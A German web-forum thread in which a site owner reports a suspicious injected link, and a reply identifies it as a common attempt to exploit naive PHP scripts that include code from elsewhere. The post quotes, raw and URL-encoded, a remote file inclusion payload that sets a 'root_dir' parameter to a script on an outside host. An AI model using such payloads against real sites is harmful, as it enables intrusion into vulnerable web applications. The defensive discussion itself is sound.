nicht angemeldet
Eingeschmuggelter Inhalt in Pfad
Ich habe gerade entdeckt, dass in einer meiner Seiten folgendes zu finden ist:
Ein Link sollte so aussehen:
http://example.com/foo.php?bar=1&baz=2
Aussehen tut der aber so (Leerzeichen vor diesem Pfad und Umbruch vor den beiden Fragezeichen)
http://example.com/foo.php?bar=1 /projects/addedit.php?root_dir=http://oursoultvxq.com/bbs/data/vip/id2.txt
??&baz=2
Das Original ist natürlich "ordentlich" URLencoded und sieht so aus:
http://example.com/foo.php?bar=1%20/projects/addedit.php%3Froot_dir%3Dhttp%3A//oursoultvxq.com/bbs/data/vip/id2.txt%0A%3F%3F%26baz%3D2
Google liefert mir diesbezüglich keine brauchbaren Ergebnisse, mit dem Script (dieses id2.txt) kann ich nicht viel anfangen.
Kann mir hier jemand auf die Sprünge helfen?
Vielen Dank
-
Hi,
Ich habe gerade entdeckt, dass in einer meiner Seiten folgendes zu finden ist:
Ein Link sollte so aussehen:
http://example.com/foo.php?bar=1&baz=2Aussehen tut der aber so (Leerzeichen vor diesem Pfad und Umbruch vor den beiden Fragezeichen)
http://example.com/foo.php?bar=1 /projects/addedit.php?root_dir=http://oursoultvxq.com/bbs/data/vip/id2.txt
??&baz=2Wo "tut der so aussehen"?
Im Quellcode deiner Seite?
Oder meinst du, dass diese Adresse im Logfile der Zugriffe auf deinen Server auftaucht?Das Original ist natürlich "ordentlich" URLencoded und sieht so aus:
http://example.com/foo.php?bar=1%20/projects/addedit.php%3Froot_dir%3Dhttp%3A//oursoultvxq.com/bbs/data/vip/id2.txt%0A%3F%3F%26baz%3D2Google liefert mir diesbezüglich keine brauchbaren Ergebnisse, mit dem Script (dieses id2.txt) kann ich nicht viel anfangen.
Das duerfte eines der ueblichen Scripte sein, um in schlecht geschriebene PHP-Applikationen/-Scripte, die in grenzenlos naiver Vertrauensseeligkeit beliebigen Code von sonstwo einbinden lassen, einzubrechen.
Wenn dein Script nicht zu dieser Kategorie zaehlt, dann ist nichts zu befuerchten, dann laeuft dieser Versuch einfach ins Leere.MfG ChrisB
--
„This is the author's opinion, not necessarily that of Starbucks.“